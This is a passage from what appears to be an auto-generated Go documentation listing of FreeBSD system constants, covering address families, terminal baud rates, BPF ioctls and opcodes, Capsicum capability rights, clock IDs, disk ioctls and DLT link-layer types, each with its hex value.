(line 48) | AF_SIP = 0x18 constant AF_SLOW (line 49) | AF_SLOW = 0x21 constant AF_SNA (line 50) | AF_SNA = 0xb constant AF_UNIX (line 51) | AF_UNIX = 0x1 constant AF_UNSPEC (line 52) | AF_UNSPEC = 0x0 constant AF_VENDOR00 (line 53) | AF_VENDOR00 = 0x27 constant AF_VENDOR01 (line 54) | AF_VENDOR01 = 0x29 constant AF_VENDOR02 (line 55) | AF_VENDOR02 = 0x2b constant AF_VENDOR03 (line 56) | AF_VENDOR03 = 0x2d constant AF_VENDOR04 (line 57) | AF_VENDOR04 = 0x2f constant AF_VENDOR05 (line 58) | AF_VENDOR05 = 0x31 constant AF_VENDOR06 (line 59) | AF_VENDOR06 = 0x33 constant AF_VENDOR07 (line 60) | AF_VENDOR07 = 0x35 constant AF_VENDOR08 (line 61) | AF_VENDOR08 = 0x37 constant AF_VENDOR09 (line 62) | AF_VENDOR09 = 0x39 constant AF_VENDOR10 (line 63) | AF_VENDOR10 = 0x3b constant AF_VENDOR11 (line 64) | AF_VENDOR11 = 0x3d constant AF_VENDOR12 (line 65) | AF_VENDOR12 = 0x3f constant AF_VENDOR13 (line 66) | AF_VENDOR13 = 0x41 constant AF_VENDOR14 (line 67) | AF_VENDOR14 = 0x43 constant AF_VENDOR15 (line 68) | AF_VENDOR15 = 0x45 constant AF_VENDOR16 (line 69) | AF_VENDOR16 = 0x47 constant AF_VENDOR17 (line 70) | AF_VENDOR17 = 0x49 constant AF_VENDOR18 (line 71) | AF_VENDOR18 = 0x4b constant AF_VENDOR19 (line 72) | AF_VENDOR19 = 0x4d constant AF_VENDOR20 (line 73) | AF_VENDOR20 = 0x4f constant AF_VENDOR21 (line 74) | AF_VENDOR21 = 0x51 constant AF_VENDOR22 (line 75) | AF_VENDOR22 = 0x53 constant AF_VENDOR23 (line 76) | AF_VENDOR23 = 0x55 constant AF_VENDOR24 (line 77) | AF_VENDOR24 = 0x57 constant AF_VENDOR25 (line 78) | AF_VENDOR25 = 0x59 constant AF_VENDOR26 (line 79) | AF_VENDOR26 = 0x5b constant AF_VENDOR27 (line 80) | AF_VENDOR27 = 0x5d constant AF_VENDOR28 (line 81) | AF_VENDOR28 = 0x5f constant AF_VENDOR29 (line 82) | AF_VENDOR29 = 0x61 constant AF_VENDOR30 (line 83) | AF_VENDOR30 = 0x63 constant AF_VENDOR31 (line 84) | AF_VENDOR31 = 0x65 constant AF_VENDOR32 (line 85) | AF_VENDOR32 = 0x67 constant AF_VENDOR33 (line 86) | AF_VENDOR33 = 0x69 constant AF_VENDOR34 (line 87) | AF_VENDOR34 = 0x6b constant AF_VENDOR35 (line 88) | AF_VENDOR35 = 0x6d constant AF_VENDOR36 (line 89) | AF_VENDOR36 = 0x6f constant AF_VENDOR37 (line 90) | AF_VENDOR37 = 0x71 constant AF_VENDOR38 (line 91) | AF_VENDOR38 = 0x73 constant AF_VENDOR39 (line 92) | AF_VENDOR39 = 0x75 constant AF_VENDOR40 (line 93) | AF_VENDOR40 = 0x77 constant AF_VENDOR41 (line 94) | AF_VENDOR41 = 0x79 constant AF_VENDOR42 (line 95) | AF_VENDOR42 = 0x7b constant AF_VENDOR43 (line 96) | AF_VENDOR43 = 0x7d constant AF_VENDOR44 (line 97) | AF_VENDOR44 = 0x7f constant AF_VENDOR45 (line 98) | AF_VENDOR45 = 0x81 constant AF_VENDOR46 (line 99) | AF_VENDOR46 = 0x83 constant AF_VENDOR47 (line 100) | AF_VENDOR47 = 0x85 constant ALTWERASE (line 101) | ALTWERASE = 0x200 constant B0 (line 102) | B0 = 0x0 constant B110 (line 103) | B110 = 0x6e constant B115200 (line 104) | B115200 = 0x1c200 constant B1200 (line 105) | B1200 = 0x4b0 constant B134 (line 106) | B134 = 0x86 constant B14400 (line 107) | B14400 = 0x3840 constant B150 (line 108) | B150 = 0x96 constant B1800 (line 109) | B1800 = 0x708 constant B19200 (line 110) | B19200 = 0x4b00 constant B200 (line 111) | B200 = 0xc8 constant B230400 (line 112) | B230400 = 0x38400 constant B2400 (line 113) | B2400 = 0x960 constant B28800 (line 114) | B28800 = 0x7080 constant B300 (line 115) | B300 = 0x12c constant B38400 (line 116) | B38400 = 0x9600 constant B460800 (line 117) | B460800 = 0x70800 constant B4800 (line 118) | B4800 = 0x12c0 constant B50 (line 119) | B50 = 0x32 constant B57600 (line 120) | B57600 = 0xe100 constant B600 (line 121) | B600 = 0x258 constant B7200 (line 122) | B7200 = 0x1c20 constant B75 (line 123) | B75 = 0x4b constant B76800 (line 124) | B76800 = 0x12c00 constant B921600 (line 125) | B921600 = 0xe1000 constant B9600 (line 126) | B9600 = 0x2580 constant BIOCFEEDBACK (line 127) | BIOCFEEDBACK = 0x8004427c constant BIOCFLUSH (line 128) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 129) | BIOCGBLEN = 0x40044266 constant BIOCGDIRECTION (line 130) | BIOCGDIRECTION = 0x40044276 constant BIOCGDLT (line 131) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 132) | BIOCGDLTLIST = 0xc0104279 constant BIOCGETBUFMODE (line 133) | BIOCGETBUFMODE = 0x4004427d constant BIOCGETIF (line 134) | BIOCGETIF = 0x4020426b constant BIOCGETZMAX (line 135) | BIOCGETZMAX = 0x4008427f constant BIOCGHDRCMPLT (line 136) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 137) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 138) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 139) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 140) | BIOCGSTATS = 0x4008426f constant BIOCGTSTAMP (line 141) | BIOCGTSTAMP = 0x40044283 constant BIOCIMMEDIATE (line 142) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 143) | BIOCLOCK = 0x2000427a constant BIOCPROMISC (line 144) | BIOCPROMISC = 0x20004269 constant BIOCROTZBUF (line 145) | BIOCROTZBUF = 0x40184280 constant BIOCSBLEN (line 146) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRECTION (line 147) | BIOCSDIRECTION = 0x80044277 constant BIOCSDLT (line 148) | BIOCSDLT = 0x80044278 constant BIOCSETBUFMODE (line 149) | BIOCSETBUFMODE = 0x8004427e constant BIOCSETF (line 150) | BIOCSETF = 0x80104267 constant BIOCSETFNR (line 151) | BIOCSETFNR = 0x80104282 constant BIOCSETIF (line 152) | BIOCSETIF = 0x8020426c constant BIOCSETVLANPCP (line 153) | BIOCSETVLANPCP = 0x80044285 constant BIOCSETWF (line 154) | BIOCSETWF = 0x8010427b constant BIOCSETZBUF (line 155) | BIOCSETZBUF = 0x80184281 constant BIOCSHDRCMPLT (line 156) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 157) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 158) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 159) | BIOCSSEESENT = 0x80044277 constant BIOCSTSTAMP (line 160) | BIOCSTSTAMP = 0x80044284 constant BIOCVERSION (line 161) | BIOCVERSION = 0x40044271 constant BPF_A (line 162) | BPF_A = 0x10 constant BPF_ABS (line 163) | BPF_ABS = 0x20 constant BPF_ADD (line 164) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 165) | BPF_ALIGNMENT = 0x8 constant BPF_ALU (line 166) | BPF_ALU = 0x4 constant BPF_AND (line 167) | BPF_AND = 0x50 constant BPF_B (line 168) | BPF_B = 0x10 constant BPF_BUFMODE_BUFFER (line 169) | BPF_BUFMODE_BUFFER = 0x1 constant BPF_BUFMODE_ZBUF (line 170) | BPF_BUFMODE_ZBUF = 0x2 constant BPF_DIV (line 171) | BPF_DIV = 0x30 constant BPF_H (line 172) | BPF_H = 0x8 constant BPF_IMM (line 173) | BPF_IMM = 0x0 constant BPF_IND (line 174) | BPF_IND = 0x40 constant BPF_JA (line 175) | BPF_JA = 0x0 constant BPF_JEQ (line 176) | BPF_JEQ = 0x10 constant BPF_JGE (line 177) | BPF_JGE = 0x30 constant BPF_JGT (line 178) | BPF_JGT = 0x20 constant BPF_JMP (line 179) | BPF_JMP = 0x5 constant BPF_JSET (line 180) | BPF_JSET = 0x40 constant BPF_K (line 181) | BPF_K = 0x0 constant BPF_LD (line 182) | BPF_LD = 0x0 constant BPF_LDX (line 183) | BPF_LDX = 0x1 constant BPF_LEN (line 184) | BPF_LEN = 0x80 constant BPF_LSH (line 185) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 186) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 187) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 188) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 189) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 190) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 191) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 192) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 193) | BPF_MISC = 0x7 constant BPF_MOD (line 194) | BPF_MOD = 0x90 constant BPF_MSH (line 195) | BPF_MSH = 0xa0 constant BPF_MUL (line 196) | BPF_MUL = 0x20 constant BPF_NEG (line 197) | BPF_NEG = 0x80 constant BPF_OR (line 198) | BPF_OR = 0x40 constant BPF_RELEASE (line 199) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 200) | BPF_RET = 0x6 constant BPF_RSH (line 201) | BPF_RSH = 0x70 constant BPF_ST (line 202) | BPF_ST = 0x2 constant BPF_STX (line 203) | BPF_STX = 0x3 constant BPF_SUB (line 204) | BPF_SUB = 0x10 constant BPF_TAX (line 205) | BPF_TAX = 0x0 constant BPF_TXA (line 206) | BPF_TXA = 0x80 constant BPF_T_BINTIME (line 207) | BPF_T_BINTIME = 0x2 constant BPF_T_BINTIME_FAST (line 208) | BPF_T_BINTIME_FAST = 0x102 constant BPF_T_BINTIME_MONOTONIC (line 209) | BPF_T_BINTIME_MONOTONIC = 0x202 constant BPF_T_BINTIME_MONOTONIC_FAST (line 210) | BPF_T_BINTIME_MONOTONIC_FAST = 0x302 constant BPF_T_FAST (line 211) | BPF_T_FAST = 0x100 constant BPF_T_FLAG_MASK (line 212) | BPF_T_FLAG_MASK = 0x300 constant BPF_T_FORMAT_MASK (line 213) | BPF_T_FORMAT_MASK = 0x3 constant BPF_T_MICROTIME (line 214) | BPF_T_MICROTIME = 0x0 constant BPF_T_MICROTIME_FAST (line 215) | BPF_T_MICROTIME_FAST = 0x100 constant BPF_T_MICROTIME_MONOTONIC (line 216) | BPF_T_MICROTIME_MONOTONIC = 0x200 constant BPF_T_MICROTIME_MONOTONIC_FAST (line 217) | BPF_T_MICROTIME_MONOTONIC_FAST = 0x300 constant BPF_T_MONOTONIC (line 218) | BPF_T_MONOTONIC = 0x200 constant BPF_T_MONOTONIC_FAST (line 219) | BPF_T_MONOTONIC_FAST = 0x300 constant BPF_T_NANOTIME (line 220) | BPF_T_NANOTIME = 0x1 constant BPF_T_NANOTIME_FAST (line 221) | BPF_T_NANOTIME_FAST = 0x101 constant BPF_T_NANOTIME_MONOTONIC (line 222) | BPF_T_NANOTIME_MONOTONIC = 0x201 constant BPF_T_NANOTIME_MONOTONIC_FAST (line 223) | BPF_T_NANOTIME_MONOTONIC_FAST = 0x301 constant BPF_T_NONE (line 224) | BPF_T_NONE = 0x3 constant BPF_T_NORMAL (line 225) | BPF_T_NORMAL = 0x0 constant BPF_W (line 226) | BPF_W = 0x0 constant BPF_X (line 227) | BPF_X = 0x8 constant BPF_XOR (line 228) | BPF_XOR = 0xa0 constant BRKINT (line 229) | BRKINT = 0x2 constant CAP_ACCEPT (line 230) | CAP_ACCEPT = 0x200000020000000 constant CAP_ACL_CHECK (line 231) | CAP_ACL_CHECK = 0x400000000010000 constant CAP_ACL_DELETE (line 232) | CAP_ACL_DELETE = 0x400000000020000 constant CAP_ACL_GET (line 233) | CAP_ACL_GET = 0x400000000040000 constant CAP_ACL_SET (line 234) | CAP_ACL_SET = 0x400000000080000 constant CAP_ALL0 (line 235) | CAP_ALL0 = 0x20007ffffffffff constant CAP_ALL1 (line 236) | CAP_ALL1 = 0x4000000001fffff constant CAP_BIND (line 237) | CAP_BIND = 0x200000040000000 constant CAP_BINDAT (line 238) | CAP_BINDAT = 0x200008000000400 constant CAP_CHFLAGSAT (line 239) | CAP_CHFLAGSAT = 0x200000000001400 constant CAP_CONNECT (line 240) | CAP_CONNECT = 0x200000080000000 constant CAP_CONNECTAT (line 241) | CAP_CONNECTAT = 0x200010000000400 constant CAP_CREATE (line 242) | CAP_CREATE = 0x200000000000040 constant CAP_EVENT (line 243) | CAP_EVENT = 0x400000000000020 constant CAP_EXTATTR_DELETE (line 244) | CAP_EXTATTR_DELETE = 0x400000000001000 constant CAP_EXTATTR_GET (line 245) | CAP_EXTATTR_GET = 0x400000000002000 constant CAP_EXTATTR_LIST (line 246) | CAP_EXTATTR_LIST = 0x400000000004000 constant CAP_EXTATTR_SET (line 247) | CAP_EXTATTR_SET = 0x400000000008000 constant CAP_FCHDIR (line 248) | CAP_FCHDIR = 0x200000000000800 constant CAP_FCHFLAGS (line 249) | CAP_FCHFLAGS = 0x200000000001000 constant CAP_FCHMOD (line 250) | CAP_FCHMOD = 0x200000000002000 constant CAP_FCHMODAT (line 251) | CAP_FCHMODAT = 0x200000000002400 constant CAP_FCHOWN (line 252) | CAP_FCHOWN = 0x200000000004000 constant CAP_FCHOWNAT (line 253) | CAP_FCHOWNAT = 0x200000000004400 constant CAP_FCNTL (line 254) | CAP_FCNTL = 0x200000000008000 constant CAP_FCNTL_ALL (line 255) | CAP_FCNTL_ALL = 0x78 constant CAP_FCNTL_GETFL (line 256) | CAP_FCNTL_GETFL = 0x8 constant CAP_FCNTL_GETOWN (line 257) | CAP_FCNTL_GETOWN = 0x20 constant CAP_FCNTL_SETFL (line 258) | CAP_FCNTL_SETFL = 0x10 constant CAP_FCNTL_SETOWN (line 259) | CAP_FCNTL_SETOWN = 0x40 constant CAP_FEXECVE (line 260) | CAP_FEXECVE = 0x200000000000080 constant CAP_FLOCK (line 261) | CAP_FLOCK = 0x200000000010000 constant CAP_FPATHCONF (line 262) | CAP_FPATHCONF = 0x200000000020000 constant CAP_FSCK (line 263) | CAP_FSCK = 0x200000000040000 constant CAP_FSTAT (line 264) | CAP_FSTAT = 0x200000000080000 constant CAP_FSTATAT (line 265) | CAP_FSTATAT = 0x200000000080400 constant CAP_FSTATFS (line 266) | CAP_FSTATFS = 0x200000000100000 constant CAP_FSYNC (line 267) | CAP_FSYNC = 0x200000000000100 constant CAP_FTRUNCATE (line 268) | CAP_FTRUNCATE = 0x200000000000200 constant CAP_FUTIMES (line 269) | CAP_FUTIMES = 0x200000000200000 constant CAP_FUTIMESAT (line 270) | CAP_FUTIMESAT = 0x200000000200400 constant CAP_GETPEERNAME (line 271) | CAP_GETPEERNAME = 0x200000100000000 constant CAP_GETSOCKNAME (line 272) | CAP_GETSOCKNAME = 0x200000200000000 constant CAP_GETSOCKOPT (line 273) | CAP_GETSOCKOPT = 0x200000400000000 constant CAP_IOCTL (line 274) | CAP_IOCTL = 0x400000000000080 constant CAP_IOCTLS_ALL (line 275) | CAP_IOCTLS_ALL = 0x7fffffffffffffff constant CAP_KQUEUE (line 276) | CAP_KQUEUE = 0x400000000100040 constant CAP_KQUEUE_CHANGE (line 277) | CAP_KQUEUE_CHANGE = 0x400000000100000 constant CAP_KQUEUE_EVENT (line 278) | CAP_KQUEUE_EVENT = 0x400000000000040 constant CAP_LINKAT_SOURCE (line 279) | CAP_LINKAT_SOURCE = 0x200020000000400 constant CAP_LINKAT_TARGET (line 280) | CAP_LINKAT_TARGET = 0x200000000400400 constant CAP_LISTEN (line 281) | CAP_LISTEN = 0x200000800000000 constant CAP_LOOKUP (line 282) | CAP_LOOKUP = 0x200000000000400 constant CAP_MAC_GET (line 283) | CAP_MAC_GET = 0x400000000000001 constant CAP_MAC_SET (line 284) | CAP_MAC_SET = 0x400000000000002 constant CAP_MKDIRAT (line 285) | CAP_MKDIRAT = 0x200000000800400 constant CAP_MKFIFOAT (line 286) | CAP_MKFIFOAT = 0x200000001000400 constant CAP_MKNODAT (line 287) | CAP_MKNODAT = 0x200000002000400 constant CAP_MMAP (line 288) | CAP_MMAP = 0x200000000000010 constant CAP_MMAP_R (line 289) | CAP_MMAP_R = 0x20000000000001d constant CAP_MMAP_RW (line 290) | CAP_MMAP_RW = 0x20000000000001f constant CAP_MMAP_RWX (line 291) | CAP_MMAP_RWX = 0x20000000000003f constant CAP_MMAP_RX (line 292) | CAP_MMAP_RX = 0x20000000000003d constant CAP_MMAP_W (line 293) | CAP_MMAP_W = 0x20000000000001e constant CAP_MMAP_WX (line 294) | CAP_MMAP_WX = 0x20000000000003e constant CAP_MMAP_X (line 295) | CAP_MMAP_X = 0x20000000000003c constant CAP_PDGETPID (line 296) | CAP_PDGETPID = 0x400000000000200 constant CAP_PDKILL (line 297) | CAP_PDKILL = 0x400000000000800 constant CAP_PDWAIT (line 298) | CAP_PDWAIT = 0x400000000000400 constant CAP_PEELOFF (line 299) | CAP_PEELOFF = 0x200001000000000 constant CAP_POLL_EVENT (line 300) | CAP_POLL_EVENT = 0x400000000000020 constant CAP_PREAD (line 301) | CAP_PREAD = 0x20000000000000d constant CAP_PWRITE (line 302) | CAP_PWRITE = 0x20000000000000e constant CAP_READ (line 303) | CAP_READ = 0x200000000000001 constant CAP_RECV (line 304) | CAP_RECV = 0x200000000000001 constant CAP_RENAMEAT_SOURCE (line 305) | CAP_RENAMEAT_SOURCE = 0x200000004000400 constant CAP_RENAMEAT_TARGET (line 306) | CAP_RENAMEAT_TARGET = 0x200040000000400 constant CAP_RIGHTS_VERSION (line 307) | CAP_RIGHTS_VERSION = 0x0 constant CAP_RIGHTS_VERSION_00 (line 308) | CAP_RIGHTS_VERSION_00 = 0x0 constant CAP_SEEK (line 309) | CAP_SEEK = 0x20000000000000c constant CAP_SEEK_TELL (line 310) | CAP_SEEK_TELL = 0x200000000000004 constant CAP_SEM_GETVALUE (line 311) | CAP_SEM_GETVALUE = 0x400000000000004 constant CAP_SEM_POST (line 312) | CAP_SEM_POST = 0x400000000000008 constant CAP_SEM_WAIT (line 313) | CAP_SEM_WAIT = 0x400000000000010 constant CAP_SEND (line 314) | CAP_SEND = 0x200000000000002 constant CAP_SETSOCKOPT (line 315) | CAP_SETSOCKOPT = 0x200002000000000 constant CAP_SHUTDOWN (line 316) | CAP_SHUTDOWN = 0x200004000000000 constant CAP_SOCK_CLIENT (line 317) | CAP_SOCK_CLIENT = 0x200007780000003 constant CAP_SOCK_SERVER (line 318) | CAP_SOCK_SERVER = 0x200007f60000003 constant CAP_SYMLINKAT (line 319) | CAP_SYMLINKAT = 0x200000008000400 constant CAP_TTYHOOK (line 320) | CAP_TTYHOOK = 0x400000000000100 constant CAP_UNLINKAT (line 321) | CAP_UNLINKAT = 0x200000010000400 constant CAP_UNUSED0_44 (line 322) | CAP_UNUSED0_44 = 0x200080000000000 constant CAP_UNUSED0_57 (line 323) | CAP_UNUSED0_57 = 0x300000000000000 constant CAP_UNUSED1_22 (line 324) | CAP_UNUSED1_22 = 0x400000000200000 constant CAP_UNUSED1_57 (line 325) | CAP_UNUSED1_57 = 0x500000000000000 constant CAP_WRITE (line 326) | CAP_WRITE = 0x200000000000002 constant CFLUSH (line 327) | CFLUSH = 0xf constant CLOCAL (line 328) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 329) | CLOCK_MONOTONIC = 0x4 constant CLOCK_MONOTONIC_FAST (line 330) | CLOCK_MONOTONIC_FAST = 0xc constant CLOCK_MONOTONIC_PRECISE (line 331) | CLOCK_MONOTONIC_PRECISE = 0xb constant CLOCK_PROCESS_CPUTIME_ID (line 332) | CLOCK_PROCESS_CPUTIME_ID = 0xf constant CLOCK_PROF (line 333) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 334) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_FAST (line 335) | CLOCK_REALTIME_FAST = 0xa constant CLOCK_REALTIME_PRECISE (line 336) | CLOCK_REALTIME_PRECISE = 0x9 constant CLOCK_SECOND (line 337) | CLOCK_SECOND = 0xd constant CLOCK_THREAD_CPUTIME_ID (line 338) | CLOCK_THREAD_CPUTIME_ID = 0xe constant CLOCK_UPTIME (line 339) | CLOCK_UPTIME = 0x5 constant CLOCK_UPTIME_FAST (line 340) | CLOCK_UPTIME_FAST = 0x8 constant CLOCK_UPTIME_PRECISE (line 341) | CLOCK_UPTIME_PRECISE = 0x7 constant CLOCK_VIRTUAL (line 342) | CLOCK_VIRTUAL = 0x1 constant CPUSTATES (line 343) | CPUSTATES = 0x5 constant CP_IDLE (line 344) | CP_IDLE = 0x4 constant CP_INTR (line 345) | CP_INTR = 0x3 constant CP_NICE (line 346) | CP_NICE = 0x1 constant CP_SYS (line 347) | CP_SYS = 0x2 constant CP_USER (line 348) | CP_USER = 0x0 constant CREAD (line 349) | CREAD = 0x800 constant CRTSCTS (line 350) | CRTSCTS = 0x30000 constant CS5 (line 351) | CS5 = 0x0 constant CS6 (line 352) | CS6 = 0x100 constant CS7 (line 353) | CS7 = 0x200 constant CS8 (line 354) | CS8 = 0x300 constant CSIZE (line 355) | CSIZE = 0x300 constant CSTART (line 356) | CSTART = 0x11 constant CSTATUS (line 357) | CSTATUS = 0x14 constant CSTOP (line 358) | CSTOP = 0x13 constant CSTOPB (line 359) | CSTOPB = 0x400 constant CSUSP (line 360) | CSUSP = 0x1a constant CTL_HW (line 361) | CTL_HW = 0x6 constant CTL_KERN (line 362) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 363) | CTL_MAXNAME = 0x18 constant CTL_NET (line 364) | CTL_NET = 0x4 constant DIOCGATTR (line 365) | DIOCGATTR = 0xc148648e constant DIOCGDELETE (line 366) | DIOCGDELETE = 0x80106488 constant DIOCGFLUSH (line 367) | DIOCGFLUSH = 0x20006487 constant DIOCGFRONTSTUFF (line 368) | DIOCGFRONTSTUFF = 0x40086486 constant DIOCGFWHEADS (line 369) | DIOCGFWHEADS = 0x40046483 constant DIOCGFWSECTORS (line 370) | DIOCGFWSECTORS = 0x40046482 constant DIOCGIDENT (line 371) | DIOCGIDENT = 0x41006489 constant DIOCGMEDIASIZE (line 372) | DIOCGMEDIASIZE = 0x40086481 constant DIOCGPHYSPATH (line 373) | DIOCGPHYSPATH = 0x4400648d constant DIOCGPROVIDERNAME (line 374) | DIOCGPROVIDERNAME = 0x4400648a constant DIOCGSECTORSIZE (line 375) | DIOCGSECTORSIZE = 0x40046480 constant DIOCGSTRIPEOFFSET (line 376) | DIOCGSTRIPEOFFSET = 0x4008648c constant DIOCGSTRIPESIZE (line 377) | DIOCGSTRIPESIZE = 0x4008648b constant DIOCSKERNELDUMP (line 378) | DIOCSKERNELDUMP = 0x80506490 constant DIOCSKERNELDUMP_FREEBSD11 (line 379) | DIOCSKERNELDUMP_FREEBSD11 = 0x80046485 constant DIOCZONECMD (line 380) | DIOCZONECMD = 0xc080648f constant DLT_A429 (line 381) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 382) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 383) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 384) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 385) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 386) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 387) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 388) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 389) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 390) | DLT_AURORA = 0x7e constant DLT_AX25 (line 391) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 392) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 393) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_BREDR_BB (line 394) | DLT_BLUETOOTH_BREDR_BB = 0xff constant DLT_BLUETOOTH_HCI_H4 (line 395) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 396) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_BLUETOOTH_LE_LL (line 397) | DLT_BLUETOOTH_LE_LL = 0xfb constant DLT_BLUETOOTH_LE_LL_WITH_PHDR (line 398) | DLT_BLUETOOTH_LE_LL_WITH_PHDR = 0x100 constant DLT_BLUETOOTH_LINUX_MONITOR (line 399) | DLT_BLUETOOTH_LINUX_MONITOR = 0xfe constant DLT_CAN20B (line 400) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 401) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 402) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 403) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 404) | DLT_CISCO_IOS = 0x76 constant DLT_CLASS_NETBSD_RAWAF (line 405) | DLT_CLASS_NETBSD_RAWAF = 0x2240000 constant DLT_C_HDLC (line 406) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 407) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 408) | DLT_DBUS = 0xe7 constant DLT_DECT (line 409) | DLT_DECT = 0xdd constant DLT_DISPLAYPORT_AUX (line 410) | DLT_DISPLAYPORT_AUX = 0x113 constant DLT_DOCSIS (line 411) | DLT_DOCSIS = 0x8f constant DLT_DOCSIS31_XRA31 (line 412) | DLT_DOCSIS31_XRA31 = 0x111 constant DLT_DVB_CI (line 413) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 414) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 415) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 416) | DLT_EN3MB = 0x2 constant DLT_ENC (line 417) | DLT_ENC = 0x6d constant DLT_EPON (line 418) | DLT_EPON = 0x103 constant DLT_ERF (line 419) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 420) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 421) | DLT_ERF_POS = 0xb0 constant DLT_ETHERNET_MPACKET (line 422) | DLT_ETHERNET_MPACKET = 0x112 constant DLT_FC_2 (line 423) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 424) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 425) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 426) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 427) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 428) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 429) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 430) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 431) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 432) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 433) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 434) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 435) | DLT_GSMTAP_UM = 0xd9 constant DLT_IBM_SN (line 436) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 437) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 438) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 439) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 440) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 441) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 442) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 443) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 444) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 445) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 446) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 447) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_INFINIBAND (line 448) | DLT_INFINIBAND = 0xf7 constant DLT_IPFILTER (line 449) | DLT_IPFILTER = 0x74 constant DLT_IPMB_KONTRON (line 450) | DLT_IPMB_KONTRON = 0xc7 constant DLT_IPMB_LINUX (line 451) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPMI_HPM_2 (line 452) | DLT_IPMI_HPM_2 = 0x104 constant DLT_IPNET (line 453) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 454) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 455) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 456) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 457) | DLT_IP_OVER_FC = 0x7a constant DLT_ISO_14443 (line 458) | DLT_ISO_14443 = 0x108 constant DLT_JUNIPER_ATM1 (line 459) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 460) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 461) | DLT_JUNIPER_ATM_CEMIC = 0xee 